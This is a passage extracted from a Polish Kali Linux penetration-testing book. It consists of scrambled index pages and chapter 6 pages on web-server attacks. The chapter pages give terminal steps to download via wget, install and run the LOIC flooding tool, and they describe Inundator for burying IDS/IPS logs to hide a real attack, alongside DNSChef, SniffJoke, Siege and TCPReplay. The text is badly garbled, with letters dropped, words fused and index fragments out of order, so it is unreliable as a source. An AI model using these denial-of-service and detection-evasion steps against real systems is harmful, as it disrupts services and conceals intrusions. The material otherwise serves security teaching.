ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
